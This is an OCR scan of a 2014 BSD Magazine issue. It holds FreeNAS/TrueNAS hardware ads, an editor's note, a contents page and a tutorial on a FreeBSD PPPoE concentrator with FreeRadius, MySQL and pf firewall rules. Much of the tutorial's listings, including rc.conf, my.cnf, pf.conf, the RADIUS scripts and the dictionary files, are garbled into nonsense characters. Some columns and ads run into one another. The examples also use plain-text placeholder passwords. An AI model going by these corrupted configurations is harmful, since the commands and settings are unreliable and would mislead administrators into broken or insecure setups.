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HOW IMPORTANT IS YOUR DATA? 


Years of family photos. Your entire music 
and movie collection. Office documents 
you've put hours of work into. Backups for 
every computer you own. We ask again, how 
important is your data? 


NOW IMAGINE LOSING IT ALL 


Losing one bit - that’s all it takes. One single bit, and 
your file is gone. 


The worst part? You won't know until you 
absolutely need that file again. 


THE SOLUTION 


The FreeNAS Mini has emerged as the clear choice to 
save your digital life. No other NAS in its class offers 
ECC (error correcting code) memory and ZFS bitrot 
protection to ensure data always reaches disk 
without corruption and never degrades over time. 


No other NAS combines the inherent data integrity 
and security of the ZFS filesystem with fast on-disk 
encryption. No other NAS provides comparable power 
and flexibility. The FreeNAS Mini is, hands-down, the 
best home and small office storage appliance you can 
buy on the market. When it comes to saving your 
important data, there simply is no other solution. 


Example of one-bit corruption 


The Mini boasts these state-of-the- 
art features: 


- 8-core 2.4GHz Intel® Atom™ processor 

« Up to 16TB of storage capacity 

« 16GB of ECC memory (with the option to upgrade 
to 32GB) 

« 2x 1 Gigabit network controllers 

« Remote management port (IPMI) 

- Tool-less design; hot swappable drive trays 

« FreeNAS installed and configured 


Intel, the Intel logo, Intel Atom and Intel Atom Inside are trademarks of Intel Corporation in the U.S. and/or other countries. 


FREENAS 


CERTIFIED 
STORAGE 


With over six million downloads, 
FreeNAS is undisputedly the most 
popular storage operating system 
in the world. 


Sure, you could build your own FreeNAS system: 
research every hardware option, order all the 

parts, wait for everything to ship and arrive, vent at 
customer service because it hasn't, and finally build it 
yourself while hoping everything fits - only to install 
the software and discover that the system you spent 
days agonizing over isn’t even compatible. Or... 


MAKE IT EASY ON YOURSELF 


As the sponsors and lead developers of the FreeNAS 
project, ixsystems has combined over 20 years of 
hardware experience with our FreeNAS expertise to 
bring you FreeNAS Certified Storage. We make it 
easy to enjoy all the benefits of FreeNAS without 
the headache of building, setting up, configuring, 
and supporting it yourself. As one of the leaders in 
the storage industry, you know that you're getting the 
best combination of hardware designed for optimal 
performance with FreeNAS. 


Every FreeNAS server we ship is... 


» Custom built and optimized for your use case 

» Installed, configured, tested, and guaranteed to work out 
of the box 

» Supported by the Silicon Valley team that designed and 
built it 

» Backed by a 3 years parts and labor limited warranty 


As one of the leaders in the storage industry, you 
know that you're getting the best combination 

of hardware designed for optimal performance 

with FreeNAS. Contact us today for a FREE Risk 
Elimination Consultation with one of our FreeNAS 
experts. Remember, every purchase directly supports 
the FreeNAS project so we can continue adding 
features and improvements to the software for years 
to come. And really - why would you buy a FreeNAS 
server from anyone else? 


FreeNAS 1U 

- Intel® Xeon® Processor E3-1200v2 Family 

- Up to 16TB of storage capacity 

* 16GB ECC memory (upgradable to 32GB) 

« 2x 10/100/1000 Gigabit Ethernet controllers 
« Redundant power supply 


FreeNAS 2U 
- 2x Intel® Xeon® Processors E5-2600v2 Family 
- Up to 48TB of storage capacity 
- 32GB ECC memory (upgradable to 128GB) 
« 4x 1GbE Network interface (Onboard) - 
(Upgradable to 2 x 10 Gigabit Interface) 
« Redundant Power Supply 


http://www.iXsystems.com/storage/freenas-certified-storage/ 


Intel, the Intel logo, the Intel Inside logo and Xeon are trademarks of Intel Corporation in the U.S. and/or other countries. 


EDITOR’S WORD 


Hello BSD users, 


e, the BSD Mag team, are releasing the new BSD 
issue. This issue includes the next articles that will 
upgrade your admin skills. We hope that you will find 
the articles useful. Our ultimate goal is to provide you with the 
knowledge and skills you need in your professional careers. 
First, | would like to mention that we are publishing the last part 
of the Unix+ Command article and now you have all that you need 
to secure your systems and to check what parts are unsecure. 
If you need your own centralized server you must read Tiago’s 
article and see how to make it step by step. For the weekend, we 
will recommend to start playing with 3D objects. Rob will show you 
what you can do and how to use Gimp to create your own images. 
| am looking for the next topics for 2015. I'd love to receive your 
suggestions regarding what articles should be in the next issues 
of BSD. If you think we’ve missed a very interesting subject that 
Should be covered, do not hesitate to write to us. 
| would like to present more and more Unix-oriented projects so 
feel free to send your suggestions. 
As always, we would like to send a warm “Thank You”. 
If you want to go on a real life, open source journey with our rich 
content workshops, publications, tutorials, and so on or if you want 
to get in touch with our team, please email us. 


Enjoy reading, 
Ewa & the BSD Mag Team 
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IN BUSINESS 


FreeNAS 
in an Enterprise Environment 


By the time you're reading this, FreeNAS has been downloaded 
more than 5.5 million times. For home users, it’s become an 


indispensable part of their daily lives, akin to the DVR. ) = 
Meanwhile, all over the world, thousands of businesses \ 35 tems 
universities, and government departments use FreeNAS to Ds 


build effective storage solutions in myriad applications 


What you willlearn.. 7E INTERRUPT THIS MAGAZINE TO BRING 


« How TrueNAS builds off the strong points of the FreeBSD and 


meciennlan > YOU THIS IMPORTANT ANNOUNCEMENT: 
| | = 


* How TrueNAs meets modern storage challenges for entery 
THE PEOPLE WHO DEVELOP FREENAS, THE WORLD'S MOST 
T he FreeNAS operating systems is fre POPULAR STORAGE OS, HAVE JUST REVAMPED TRUENAS. 


the public and offers thorough doc 
active community, and a feature-rig 
the storage environment. Based on Free 
can share over a host of protocols (SM§ 
FTP, iSCSI, etc) and features an intuiti 
the ZFS file system, a plug-in system 
much more. 
Despite the massive popularity g 
aren't aware of its big brother dut 
data in some of the most demand 
environments: the proven, enterp 
professionally-supported line of 
But what makes TrueNAS diffa : , 1 
Well, I'm glad you asked... J a 


Commercial Grade Supp 
When a mission critical stor 


organization's whole operat POWER WITHOUT CONTROL MEANS NOTHING. 
fcc wigs nl TRUENAS STORAGE GIVES YOU BOTH. 
and running in a timely 
responsiveness and expe 
oe MV Simple Management Mi Self-Healing Filesystem 
Created by the sa (Vj Hybrid Flash Acceleration ( High Availability 
developed FreeNAS. 
VjfeIntelligent Compresssion (Vie Qualified for VMware and 
(Vj All Features Provided HyperV 
Up Front (no hidden Vi Works Great With Citrix 
licensing fees) XenServer® 


To learn more, visit: www.iXsystems.com/truenas 


POWERED BY ollie one shisaraamecne 

tel, the lintel loro, lint vd Intel Xeon linsic € trademarks of Intel Corporation in the US. and/or other countries. 
VMware and VMware Ready are registered trademarks or trademarks of VMware, Inc.in the United States and other jurisdictions. 
Citrix makes and you receive no representations or warranties of any kind with respect to the third party products, its functionality, the test(s) or the results 
there from, whe the rexpressed, Iimplled, statutary oF other se, Including witheaurt limlte atic an thope of fitness fora par rcul r purpose, merchantability 
no infring Ten itle Toth Sere pe nitted by a arin m aa, In ine evel hall Ci be liahle for clarvii ace ofa be kin id whatsoever Se akeay Out 
of you of the th ind party produ fhether direct, in “ irect, special, eases , imcic “ide anital, multiple le ver other dam 
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CONTENTS 


Tiago Felipe Goncalves 

Tiago, in his article, presents how to use a PPPoE Concentrator Dual-Stack (v4/v6) based on 
open source software for small and midsize Internet service providers. He will also describe how 
to make a FreeRadius centralized server and will cover its settings, once they are essential for 
the concentrator’s operation. 


Rob Somerville 
The next part of our Gimp series will be about 3D objects. In this article, Rob will give you more 
information about how to create a realistic 3D object for a FreeBSD carton that is print ready. 


Craig S. Wright 

The last part of Craig’s article will give you insight into Pen Testing and Audits. Craig will present 
the Netcat tool. Netcat has a number of pre-existing scripts that can allow it to act as a simple 
vulnerability scanner. It does this by connecting to the port to be tested, entering data to test a 
vulnerability and returning the result. 


Michael Ortega 

Application Security testing tools are often the best solution for security professionals tasked with 
securing applications throughout the Software Development Lifecycle (SDLC). This is where we 
introduce Acunetix! As a precursor to the remainder of this article, Michael has had the opportunity 
to work with a number of Application Security tools for large enterprises. 


Rob Somerville 


Performance and 
reliability is critical 


"a : we 
¥ | “= 


Download syslog-ng Premium Edition 
product evaluation here 


Attend to a free logging tech webinar here 


BalaBit 


IT Security 


www.balabit.com 


syslog-ng log server 


The world's first High-Speed Reliable Logging™ technology 


HIGH-SPEED RELIABLE LOGGING 


m above 500 000 messages per second 


=m zero message loss due to the 
Reliable Log Transfer Protocol™ 


= trusted log transfer and storage 


The High-Speed Reli 


Dual-Stack! 


The case below is about how to ride a PPPoE 
Concentrator Dual-Stack (v4/v6) based on open 
source software for small and midsize internet service M() 
providers. We will also describe how to make a 
FreeRadius centralized server (talk quickly because the 
focus is the concentrator) and will cover its settings, 


PPPoE Concentrator 


— / /IL/ LENNY LAAN 


once they are essential for the concentrator’s operation. 


LEASE #15, using mpd5, pf (containing a set of 

firewall rules for administration with the support, 
sysadmin, infrastructure, blocked users to redirect to an 
information block page, customers behind nat44 — I’m 
not adept, but with the lack of IPv4 addresses that is in- 
evitable nowadays, normalization of packages and some 
security filters), recursive dns, snmp for data collection, 
quagga running zebra, ospf, ospf6 for redistribution, web 
interface system for reading authentication logs, web in- 
terface to support customers and addressing public or pri- 
vate (nat44), fixed or dynamic ips pool system. 


yT he concentrator is based on FreeBSD 10.0-RE- 


processes in the run queue 


Fri 12:00 


o _—— 
Fri 66: 60 


From 2014/11/21 O4:47:27 To 2014/11/22 05:11:54 


Figure 1. Server load average on the results 


BSD 


Load Average 


Hardware: buy hardware according to your needs. If you 
do not understand your needs very well, there is no magic 
to solve your problems. The FreeRadius server needs fast 
disks, preferably SAS and a safe array to the data raid10 
fits well and large memory, as it can optimize mysql and 
a good NIC. | believe that nowadays 32GB is accessible 
to everyone. 

The PPPoE concentrator is a case of great myths, but 
what really matters is that the higher the frequency, the 
better your income and if combined with appropriate NICs, 
many cores are essential to the concentrator’s operation. 
HD and memory, anything goes, I’m using 2x Intel (R) 


Fri 18:00 Sat O00: 00 
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Xeon (R) CPU E5506 @ 2.13GHz (this processor is not 
appropriate because of the low frequency, but it was what 
| had at the time) and two network adapters Intel 1350-14. 

Results: ~3500 PPPoE clients, ~450Mbps and 100Kpps. 

Mathematical estimate that we could reach with this 
server: ~7000 customers and/or ~900mbps. 

Just as a remainder, we have more options. | used sev- 
eral concentrators redistributed through ospf and several 
Freeradius server redundancies through carp and mysal, 
doing master-master redundancy and this is not a rule, it 
depends on your infrastructure. And if you need better re- 
sults, invest in 6 or 8 cores and NICs Intel X540 or X520. 

Tests were performed with firewalls controlling band- 
width, ipfw through dummynet and pf using altq with sev- 
eral dynamic anchors due to the unique sense of control 
provided to altq. The results obtained with pf were better 
than the results obtained with ipfw, but with pf the admin- 
istration can get very confusing and not scalable when the 
number of customers increases. 

Other tests were performed with control ng bpf and 
ng_car, and in these cases, the results obtained in perfor- 
mance and scalability were amazing! 

| thank the community that continues to contribute to open 
source as the main reason for this publication is “knowl- 
edge must be open”! | would like to cite all references and 
ideas that many searches showed me, but nothing com- 
pares to the FreeBSD Developers Handbook and a blog 
that always has valuable information: httos://calomel.org/— 


Streams 


Hew! Screen 


Figure 2. Simple topology to implementecdo hub 
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it's well worth reading because it helped me a lot and helps 
in my day to day with BSD and networks. In particular, | 
thank the collaboration with my best friend Marcos Buzo, 
helped me a lot along the way and is always beneficial 
(Listing 1). 

Let's start with FreeRadius! 

This is the configuration of a simple and valid functional 
server. Put up some files that were not needed; only if 
they have questions to have as a reference, it has the fol- 
lowing necessary settings. Edit rc.conf with some settings 
and startup daemons (Listing 2). 

Compile a new kernel: 


cd /usr/src/sys/amd64/conf/ 

mkdir -p /root/kernels/ 

cp GENERIC /root/kernels/yggdrasil 
ln -s /root/kernel/yggdrasil . 


SH HEHEHE HE 


ed /wer/sre 


Add these lines to the kernel: 


# vi /root/kernels/yggdrasil 
device pf 
device pflog 


device pfsync 


# make builkernel KERNCONF=yggdrasil 
# make installkernel KERNCONF=yggdrasil 


~ vw 68 + & § = 


Wr 
U 


Listing 1. 


The mentioned address blocks are reserved for documentation - RFC 5737. 


The block 203.0.113.0/24 (TEST-NET-3) will represent public and routable addresses. 
The block 198.51.100.0/24 (TEST-NET-2) will represent private addresses for communication with the Radius (yggdra- 


Sil.connectionlost.com.br) server. 


The block 192.0.2.0/24 (TEST-NET-1) will represent private addresses for nat use with customers (I am against it, 


but unfortunately in a few cases we do have to use it). 


The mentioned IPv6 address prefix 1s reserved for documentation - RFC 3849. 


I am using an alias block 198.51.100.0/24 in the interface, but this flow could be segregated in a vlan or interface 


for security purposes. 


Addresses configuration: 


Gateway: 203.0.113.1 


Radius? 

HOS; yoC@cract | conneculenloce.com.or 
Evioinen is 20 3 0n these 2/24 

Radic Phos ssl. W002 724 


Coneenmaaror. 

posi. <yelloveillilel ieloi@inscieaoiloeie qe, joie 
Public P7203. 0 ise o/24 

Publ liemih 76: 20 OlE ding 457 32 

Ractic irs ioe esi ir 5,) 24 

Private. Tess 192.022 75/24 

Radic Lomel loopback Le. 197. Noe 00s ih/ 32 


Sysadmin IP: 203.0.113.69/24 
Sysadmin IPv6: 2001:db8::cafe/32 


IMtrastruicrumre cuy UP: 203.0. 113, 10/724 


Momitoreng server 1239203 s0.ibl3. 0/74 
Monitoring server IPyo: 2001; dbs; : 10/32 


Weley eiieveice 005 Ii oe ile 
Weomserver IPyo. 200M doce -i/ 32 


Listing 2. 
Ce Gy Cec, ber come 


hostname="valhalla.connectionlost.com.br” 


PEConnG etgGbO=4inets 2ZUS 50; Fis 22 Netiask 200120) .2055)” 


peconng vgb0valvasi=" inet T9e 7 ol. 10022 netmask 
ZOO oie On 


defaultrouter="203-.0.113.1” 


gateway enable="YES” 


pt senablie="VES” 


wi 


pf flags= 


DEerUves= 7 CLC) OE com 


pflog enable="YES” 


IAL IAL 


pflog flags= 
pilog_ logfile="/var/log/pflog” 


mysql enable="YES” 

My sqler@s—= — ane lay — logic! so lave relay Seine soko 
name-resolve” 

sshd_enable=yes 


badiusd enable= vis” 


feck y enable="YERS” 


ntpd_enable="YES” 


postfix enable="YES” 
sendmail enable="NO” 
sendmail submit enable="NO” 


sendmail outbound enable="NO” 


sendmail msp queue enable="NO” 


daily eclecanpioststabsenaole= NO” 
daily status marl reyceus enable=—"NoO” 


daily status inelude submin marlg= “NO” 


daily submit _queuerun="NO” 


eon 
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Auusser innodb lock wait timeout = 500 
f vie /usr/ local/ eteymy. cmt 
[client] [mysqldump] 
quick 
[mysqld] max allowed packet = 24M 
[steucie, = 3306 
skip> locking [mysql] 
keys OUrEOt 32 50M NO mae O alec clon 


max allowed packet = 4M 


SOuue OUR ner es ae ——l 4 [isamchk] 
BeaGy OU mte as te. — ll) key buffer = 384M 

pede pence OUREem as uze.— 21) sort buffer size = 64M 
Mybselil Seiew lolinesig eis Sal read buffer = 2M 
timeadmeactemssze — a0 meselige! loWleieie — ZN 


query cache size= 8M 


thread concurrency = 4 [myisamchk] 

max connections = 500 key buffer = 64M 
EMBeac Cache aac a6 SOLE DUbhem Size >= 64M 
Gueryececie gs Ze.—— 7811 read buffer = 2M 

GuCE)V eeCAcCNe mecca —a WEES burton = 71 


query cache limit = 1M 
pO Onis wie SiS 25 (ole. [mysqlhotcopy] 
Teme) Teele. sakzich 32) ALINE See Ve CLE OIUNE 
Max heap tablessize = 321) 
key buffer size = 384M #eof 
Eablescachier——lZ3 
Let’s create the log files: 


# 7 very important lines 


innodb file per table # touch /var/log/mysgqld.log 

innodb flush _method=0 DIRECT # touch /var/log/mysgqld.slow.log 

innodb log file size=1G # touch /var/log/mysgld.error.log 

innodb buffer pool size=4G # chown mysgl:mysql /var/log/mysgqld.log 

log = /var/log/mysqld.log # chown mysgl:mysql /var/log/mysgqld.slow.log 
log_ slow queries = /var/log/mysqld.slow.log # chown mysql:mysql /var/log/mysgqld.error.log 
log-error = /var/log/mysgqld.error.log 


long query time=2 

datadir = /store/db/mysql 
Skip locking 

log-bin=mysgql-bin 


server-id = 2 


innodb data_home dir = /store/db/mysql/ 
unodb daa wie Pav = wodeital ; l0M: aukoexkend 
EiMede youre nae oo Nes tzes——5)Z)) 

innodb additional mem pool size = 64M 
tninede log mle size = 123M 
innodb log buffer size = 64M 


innodb flush log at_trx commit = 1 
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Listing 4. 


f Cat /etce/ pt, cont 
#if ext 
ext if = “igb0” 


Wy 


NS) 


ere or VAS AW IIs ® 


ox eee hoch Uses aon 


#tables 
tale “sel louse Soics Lei 


# private ips tables, be careful to not block yourself 


Meelis = (elo Oe Oy Gr Ge Oy Gr ie oO Uy La, 
LOG On 050i Si owe 2040 307Eh6, LOZ. ZY 2a O08. Oy.3y 
ZNUMOUONO Gy 25D, 29.209. 2 oy 2M 

Ssh extpere =" 2220” 


see bilock—polircy dro. 


fe 


Se MOC meSmreee Sec 1 iF 


set fingerprints “/etc/pf.os 


set skip on 1o0 


scrub in all fragment reassemble max-mss 1460 


scrub out random-id max-mss 1460 


lock in log quick proto tcp flags FUP/WEUAPRSF 


lock in log quick proto tcp flags WEUAPRSF/WEUAPRSF 
lock in log quick proto tcp flags SRAFU/WEUAPRSF 
lock in leg quick proto tcp flags /WEUAPRSE 


locke AnwloguqiteksomoLe rep flags ok) on 


oer oO Oo oD Oo wo 


OQ ODO OQ OD Q iO 


lock in= log quick onorourcp flags SF/ ou 


block in quick from urpf-failed 


# try to block nmap scans 
block my log quae on) Sexe tt ener prove ECD Eromaany io 


any flags FUP/FUP 


# block RFC 1918 addresses 

Bleck dreo in log (all) quick om “ext is Erom -mareians 
UO any 

bile@clSdrep tn log (alll) Squlek on sexr elon radius. Erom 
Smartians to any 

bileck drop oul log Mall) cite son scxe yn trom amy 26 
Smartians 

leulierel< “euctojey eile Ikexe; (CS. ILIL)) (epblbicl< ‘isl Sec ayes ieekelLls) serefe)i 


any to Smartians 


+ ssn abuse 


block in log quick from <ssh_ abuse> 


block log ald 


# release and mark output 


pass out keep state 


2 Ilo 


pass guick on lo0d all 


# icmp type 8 

Pass 2 Ony-e.u DE Ine Proro Teme trom (202, (iso), 
1) Mee ie) akemoai ise 5 

Pass 2090 -cxXt 1 Aner Proro Tempo trom (203.0. 13.05} 
tO ce Ure rp hdd tic felipe — ly pen © 


# ospf 
pase proro osen from 203.0713, 0/747 te any 


# allow out the default range for traceroute (8): 

# “basetnhops*nqueries-1” (33434+64*3-1) 

Pass Ollie Om [exer I NCeeprOLO Up Tromecty eo diy spore 
33433 >< 33626 keep state 

Pass Clie on exe bic Ine prove udp From any co any 


port 33433 >< 336026 keep state 


# monitoring 
pass cuUtckK proLre {eco ude} from 2S. 0. ll) Weer an,, 
keep state 


# sql/radius 
Pass Of) o-xe Er Proce (ice, ude} from 1199 51710055) v6 


MEME Io eels kes Sireics 


# ssh 

Pass in log om 2exe 11 proLo tcp From any vo Sext 1p 
port Sssh_extport flags S/SA keep state (max-src-conn 
10, max-src-conn-rate 3/5, overload <ssh_abuse> flush) 

Pass tn lo On ssc e PE PrCLOnuCcoeEromeanymroOn se] cre 
ip radius port $ssh_extport flags S/SA keep state 
(max-src-conn 10, max-src-conn-rate 3/5, overload 


<ssh_abuse> flush) 


#teof 


BSD 


MAGAZINE 


2 


11/2014 


PPPoE Concentrator Dual-Stack! 


Listing 5. 


tov GOOc/ SCEIPES) POd daOo. sii 
sel loukia) Sle 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


tf [9-25 ol] 

then 
echo “Usage: $0 {customer}” 
exit 1 


fi 


fradius="/usr/ local/bin/mysql! —u radius -—u userradius —hA 


localhost radius -psenharadius -s -N -e” 


¢ drop= $radius”SELECT Username, AcctSessionId, NASIPAd- 
dress FROM radacct WHERE username=’$1’ AND acctstop- 
tame Ss NUL ORDER BY acciSstearktime DESC lamit is” 


username=$ (echo $c _ drop | awk ‘{print $1}’) 


Sseeston=—- (echo 2c drop |avk) {prine 72) ) 


nas=$ (echo $c_ drop | awk ‘{print $3}’) 


it) [2“onas t=] 

then 
echo “Acct-Session-Id=Ssession, User- 
Name=Susername, NAS-IP-Address=Snas” | radclient -x 
pide. 99 clsconmece mudat sonia 


fi 


#eof 


Listing 6. 

#vi coa_change.sh 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


EE iia ae | 
then 
echo “Usage: $0 {customer} {down speed in kbyte} 
{up speed in kbyte}” 
exit 1 
else 
PE [en. ez | 
then 


echo “Usage: $0 {customer} {down speed 


in kbyte} {up speed in kbyte}” 
exit 1 
else 
slp dea (Eevee Soh) 
then 
echo “Usage: $0 {customer} {down 
speed in kbyte} {up speed in kbyte}” 
exit 1 
fi 
fi 
fi 


fadius="/Ust/local/bin/mysol =U badils =u UsSerradiuis =) 
hocethosit <adius =psenkearadvus =s —N =e” 

Cc coa= $radius”SELECT Username, AcctSessionId, NASIPAd- 
dress FROM radacct WHERE username=’$1’ AND acctstop- 
time 26 NUM ORDER BY acct Sstarttime DECC damit ib-7%- 

username=$ (echo $c_coa | awk ‘{print $1}’) 

session=s (echo $c_coa | awk ‘{print $2}’) 


Mas=9(ceho 2c Coa | awk “{print 33)7) 


vdown=$ (echo $2”000”) 


Welejina slo Sel (ereleley Sxvvolonmiae 10) Iho es) “|| leje™ |) ee. eh) 4 eh) 
vdoOwneeb—= (echo. 2>  ovdowne mom | oe | "eur —c) 3 al) 
vup=s (echo $3”000”) 

VUP nb—o(echon vu 0, 125 Seber cue de 5 san) 
Wolo eles (Selio 22" swbic iale | lee || etic el | atl) 


echo User-Name=Susername,mpd-limit += \”in#l=all rate- 
limit $vup $vup_nb $vup_eb\”,mpd-limit += \”out#l=all 
rate-limit Svdown S$vdown_nb $vdown_eb\” | radclient 


< Sielsigs | el cloe! witteleie jsSialeie! 


#teof 
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We will install the necessary packages: Install mysql- 
server on your Freebsd: 


# cd /usr/ports/databases/mysql51-server/ 


# make install clean 
Install freeradius: 


# cd /usr/ports/net/freeradius2/ 


# make install clean 


Remember to enable mysq| in radius. 

This is an example file for mysql, feel free to change: 
Listing 3. 

| will post on my blog a perl script that helps make a tun- 
ing in mysql]; it’s not the case with that server because the 
hardware is well below expectations. 

Check it out when you can: www.connectionlost.com.br. 

Let's climb a firewall (can vary greatly depending on 
your infrastructure), as this is an important point of our in- 
frastructure: Listing 4. 

Now let's go over some scripts needed to make every- 
thing work. 

This script is used to generate pod packets or Packet of 
Disconnect (disconnect users): Listing 5. 

Permissions to be executable: 


# chmod +x /root/scripts/pod drop.sh 
This script is used to generate coa packets or Change 


of Authorization (in this case, the script is to change the 
speed of the client without dropping it): Listing 6. 


Permissions to be executable: 
# chmod +x /root/scripts/coa_change.sh 


This script will help you if you have many clients with 
Multiple logins. For large quantities, it can disrupt the 
functioning of your concentrator but does away with wor- 
ries in the issue of simultaneous logins and the FreeRa- 
dius problems (Listing 7). Permissions to be executable: 


# chmod +x /root/scripts/mpp.sh 
To run it put in your cron or use screen. 
# screen -dmS mpp /root/scripts/mpp.sh 


lf you have a backup script or something that can gener- 
ate a big lock on your database, remember to stop this 
script and start it after execution. Now let’s configure 
FreeRadius: Listing 8. Now we need to create a base in 
mysql for FreeRadius. This is the required schema: List- 
ing 9. Create the base: 


# mysql -u root -p 
# create database radius; 
# grant all privileges on radius.* to 
‘userradius’@’ localhost’ identified by ‘senharadius’ ; 
# grant all privileges on radius.* to 


‘userradius’ @’198.51.100.5’ identified by ‘senharadius’; 


Give access to the key that we will create on the concen- 
trator, so that the web cgi works properly: Listing 10. 


Sat Nov 22 07:40:00 2014 Packets/s any protocol 


90 k 


BO k 


7O k 


60 k 


50 k 


40 k 


30 k 


Packets/s any protocol 


20 k - 


18 k 


Fri 12: 06 


all: 86.2 k/s top: 69.3 k/s udp: 


Figure 3. NetFlow data — packets on the results 
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Listing 7. 


# cat mpp.sh 
vel | louliayy sla 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radius=s“/usr/ local/bin/mysgql =u radius =u root —h local- 


host radius -psenharadius -s -N -e” 


fo cOa— s2redius Seibel Username, Accrscssitonid, NASTPAd- 
dress FROM radacct WHERE username='’$1’ AND acctstop- 
nme tS NUL ORDER BY accisbartrime DESe limit 1s 
tail -f /var/log/radius.log | while read line 
do 
mpp=S (echo Sline | grep MPP | awk ‘{print $14}’ | sed 
ye ly Se cee ey lige 73) 
if [ “Smpp” != "J 
then 
Sradius”update radacct set acctstoptime=now () 
where acctstoptime is null and username=’ Smpp’ ;” 
echo “MPP client — “smpp” 27 
ii 


done 


#teof 


Listing 8. 
# vi /usr/local/etc/raddb/clients.conf 
Clienke Mocalhose { 
Ipadde = 127 20.0.1 
secret = testingl23 
GBequave Message salunenurecavou — Ne 
shortname = localhost 


nastype = other 


clienr 19s 25 10025 { 


shortname = valhalla 
secret = senhaclienteradius 
nastype = other 

} 

Teor 


# vi /usr/local/etc/raddb/dictionary 
SINCLUDE /usr/local/share/freeradius/dictionary 
SINCLUDE /usr/local/share/freeradius/dictionary.mpd 


#eof 


# vi /usr/local/share/freeradius/dictionary.mpd 
# 
# dictionary.mpd 


VENDOR mpd Aer a 
BEGIN-VENDOR mpd 

ATTRIBUTE mpd-rule il iS Cleric) 
ATTRIBUTE mpd-pipe Zz Sering 
ATTRIBUTE mpd-queue 3) SE Ic Lice) 
ATTRIBUTE mpd-table 4 Se CIorLicrey 
ATTRIBUTE mpd-table-static 3) 8 Cica ice) 
ATTRIBUTE mpd-filter 6 Sir ag 
ATTRIBUTE iquere aL aes yf ‘Scigaliaye| 
ATTRIBUTE ico aia ole —tecwesiess 8 iS Elaaiche| 
ATTRIBUTE mpd-input-packets 9 Sie le iave) 
ATTRIBUTE MPA-OULpUE=OCtrcESs. 10 SHE Ie ILANS) 
ATTRIBUTE mpd-output-packets 11 Sieg 
ATTRIBUTE mod-Mink WZ SCI w ice 
ATTRIBUTE mpd-bundle IES: SE laa ieye| 
ATTRIBUTE mpd-iface 14 SErING 
ATTRIBUTE mpd-iface-index ie integer 
ATTRIBUTE (ee l—zLiajeue—cieels 16 Shela lave) 
ATTRIBUTE MOC= OME OUE=aecr IL String 
ATTRIBUTE MOG mac Ewen 18 Seo miele 
ATTRIBUTE mpd-peer-ident ie) Selects 
ATTRIBUTE mpd-iface-name 20 Sele mia 
ATTRIBUTE mpd-iface-descr Za Seeing 
ATTRIBUTE mpd-iface-group Ll SE le iiale| 
ATTRIBUTE mod-drop-user 154 integer 
END-VENDOR mpd 

#eof 


# vi /usr/local/etc/raddb/radiusd. conf 
prefix = /usr/local 

Sy deie Sigsiilg SS} ouctetih.<)| 

sysconfdir = S{prefix}/etc 
localstatedir = /var 

sbindir = ${exec_prefix}/sbin 

logdir = /var/log 

raddbdir = ${sysconfdir}/raddb 
radacctdir = ${logdir}/radacct 


name = radiusd 
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confdir = ${raddbdir} 

run dir = ${localstatedir}/run/${name} 
db dir = ${raddbdir} 

libdir = fusr/local/lib/freeradius-2.2.4 


pidfile = ${run_ dir}/${name}.pid 


user = freeradius 


group = freeradius 


Max eequest, time = 30 


cleanup delay = 5 


max requests = 12800 


listen { 


type = auth acct proxy detail status coa 


Tjeysiekelia © a dk oie) od MO) 2 


port = 0 
} 
listen { 
ipeddn = 93. ole Oo Z 
port = 0 
yee = acer 
} 
hostname lookups = no 
allow _core dumps = no 


regular expressions = yes 


expended vexpress 1 ons = yes 


log { 
destination = files 
file = ${logdir}/radius.log 
syslog facility = daemon 
stripped names = no 
auth = yes 
auth badpass = yes 


auth goodpass = no 


checkrad = S{sbindir}/checkrad 


security { 
Nax patric bubess =| 21010 
nejece delay ——1 


Status server = yes 


proxy requests = yes 


SINCTUDE roxy. cons 


SINCKUMDE cliienive. come 


thread pool { 


Suc seioveos = I) 


max servers = 32 


S 


MEMS Peso BS CiaviC ine 
max Spare servers = 10 


ie KSCUESICS Pee Seiever S 0 


modules { 
SINCLUDE ${confdir}/modules/ 
INCLUDE eap.conft 


9 
SINCTUDE jogs com: 
SINCLUDE ‘sqlippool. cont 


instantiate { 
exec 
expr 
expiration 
logintime 
} 
SINCLUDE polrvey cone 


SINCLUDE sites-enabled/ 


#teof 


# vi /usr/local/etc/raddb/sgqlippool.conf 
Solippool { 

sql-instance-name = “sql” 

ippool table = “radippool” 
lease-duration = 360 

pool-key = “s{NAS-Port}” 

SINChUDEN se L/mysqi/tepool cont 
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Sql epcol loggextetes—  Mxtstiig 1? a(reoly named] iP Conmects farlhupe pret ey ade laa —sel 
Address} \ lifetime = 0 
(cide a {Caled Stabten—loy ve lin | Cal Ling= 5 baton ld max queries = 0 
POLL o(NAS=POrE) User so User=Name;) Nas table == “nes” 


SINCLUDE sql/S{database}/dialup.conf 
Sqlipoool log tsuccess =" Allocated WP: a (reply: eueamed— } 
IP-Address} from %{control:Pool-Name} \ #teof 
(did 2 Called=statton—idy eli. /Carling=stat aon kas 


port %{NAS-Port} user %{User-Name}) ” # vi /usr/local/etc/raddb/eap.conf 
sqlippool log clear = “Released 1? «| Freamed—1P— eap { 

Address} \ default eap type = mdd5 
(dite. (Called [statton=lea} Veli. | Calling station ta tame n ye <puee = 60 

user «{User-Name})” ignore unknown eap types = no 


EmSeO accounting Usetnane bug == Me 
sqlippool log farled = "iP Allocation FAILED from max sessions = 4096 


S{control:Pool-Name} \ 


(aug Called Stanton- ley eli, | Conmigo Ommaney md5 { 
port «{NAS-Port} user %{User-Name}) ” } 
sqlippool log nopool = “No Pool-Name defined \ leap { 
(did (a Called=statvon— icy scl <a Calling=Statvon- kas } 
port s{NAS-Port} user %{User-Name}) ” 
gtc { 
} auibh Gyee = EAP 
} 
#eof 
tls f 
¢ View usa, llogaly ete) raddby sqilacome certdir = o{contdir}/certs 
Seay Ca@din — o(cCconbain!/ centre 
database = “mysql” 
driver = “rim sql Si{database}” private key password = whatever 
server = “localhost” private key file = ${certdir}/server.pem 
login = “userradius” 
password = “senharadius” certificate file = ${certdir}/server.pem 
radius db = “radius” 
accu tabilel = “radacct” CA file = S${cadir}/ca.pem 
ace tablieZ =~ radacer 
postauth table = “radpostauth” dh file = ${certdir}/dh 
auuneheel table === waceheck” random file = ${certdir}/random 
euithtep ly table = nadzeply” 
guoupehneck table = “radgroupcheck” CA path = ${cadir} 
GECUPpLeply seablie =~ badd roupreply” 
USeELEGECUS able = Tusercdroup Cipher ist =) DEE AUn” 
read groups = yes Make Cet COMmande— |” cere din)/ DOOrarbap 
deletestalesessions = yes 
sqltrace = no cache { 
